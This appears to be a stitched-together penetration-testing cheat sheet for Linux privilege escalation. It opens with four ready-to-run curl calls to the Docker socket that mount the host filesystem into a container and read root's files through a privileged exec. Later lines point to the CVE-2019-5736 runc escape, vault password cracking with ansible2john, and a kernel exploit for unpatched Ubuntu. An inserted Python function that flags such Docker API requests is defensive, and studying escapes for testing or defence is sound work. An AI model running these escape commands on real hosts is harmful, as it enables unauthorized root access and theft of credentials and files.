Linux
1) curl -i -s -k -X 'POST' -H 'Content-Type: application/json' --data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "188a2704d8b0","Volumes": {"/hostos/": {}},"HostConfig": {"Binds": ["/:/hostos"]}}' http://localhost/containers/create --unix-socket /var/run/docker.sock
2) curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/<container_id>/start
3) curl -i -s -X POST -H "Content-Type: application/json" --data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/hostos/root/root.txt"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' http://localhost/containers/<container_id>/exec --unix-socket /var/run/docker.sock
4) curl -i -s -X POST -H 'Content-Type: application/json' --data-binary '{"Detach": false,"Tty": false}' http://localhost/exec/<exec_id>/start --unix-socket /var/run/docker.sock
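
On the detection side, the request bodies in steps 1 and 3 carry two recognizable markers: a bind mount of the host root and a privileged exec. The following is an added example, not part of the original notes, that audits Docker API request bodies for both; the function names, the sensitive-path list and the sample bodies are assumptions constructed for illustration.

```python
import json

# Constructed samples mirroring the request bodies of steps 1 and 3 above.
CREATE_BODY = ('{"Image": "188a2704d8b0", "Entrypoint": "/bin/bash", '
               '"Volumes": {"/hostos/": {}}, "HostConfig": {"Binds": ["/:/hostos"]}}')
EXEC_BODY = '{"Cmd": ["cat", "/hostos/root/root.txt"], "Privileged": true, "Tty": true}'
# Constructed benign request for comparison.
BENIGN_BODY = '{"Image": "nginx", "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]}}'

# Assumption: illustrative list of host paths that should never reach a container.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys",
                        "/var/run/docker.sock", "/run/docker.sock"}


def normalize(path):
    """Collapse trailing slashes so '/etc/' and '/etc' compare equal."""
    return path.rstrip("/") or "/"


def audit_docker_request(raw_body):
    """Return findings for a containers/create or containers/<id>/exec JSON body."""
    body = json.loads(raw_body)
    host_config = body.get("HostConfig") or {}
    findings = []

    # Legacy bind syntax: "host_path:container_path[:options]".
    sources = []
    for bind in host_config.get("Binds") or []:
        parts = bind.split(":")
        read_only = len(parts) > 2 and "ro" in parts[2].split(",")
        sources.append((parts[0], read_only))
    # Newer mount syntax: {"Type": "bind", "Source": ..., "ReadOnly": ...}.
    for mount in host_config.get("Mounts") or []:
        if mount.get("Type") == "bind":
            sources.append((mount.get("Source", ""), bool(mount.get("ReadOnly"))))

    for source, read_only in sources:
        # Named volumes and empty sources do not start with "/" and are skipped.
        if source.startswith("/") and normalize(source) in SENSITIVE_HOST_PATHS:
            mode = "read-only" if read_only else "read-write"
            findings.append(f"sensitive host path {normalize(source)} bind-mounted {mode}")

    # "Privileged" is top-level on exec requests and under HostConfig on create.
    if body.get("Privileged") or host_config.get("Privileged"):
        findings.append("privileged execution requested")
    return findings
```

The same function can be run over request bodies captured by a socket proxy or an authorization plugin placed in front of /var/run/docker.sock.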
If you have a low-privileged user and can run "sudo docker exec ...", chances are you can use CVE-2019-5736 (Ubuntu 18.04, Debian 9) to escalate to root on the host. Modify main.go with your payload and execute it in the container. Then run another "sudo docker exec ..." to trigger it.
Find and check "ansible.yml". The encrypted password can be converted with "ansible2john" and then decrypted:
cat pw.txt | ansible-vault decrypt
Should work on most Ubuntus not patched after March 2021, tested on 4.15.0-132-generic #136-Ubuntu.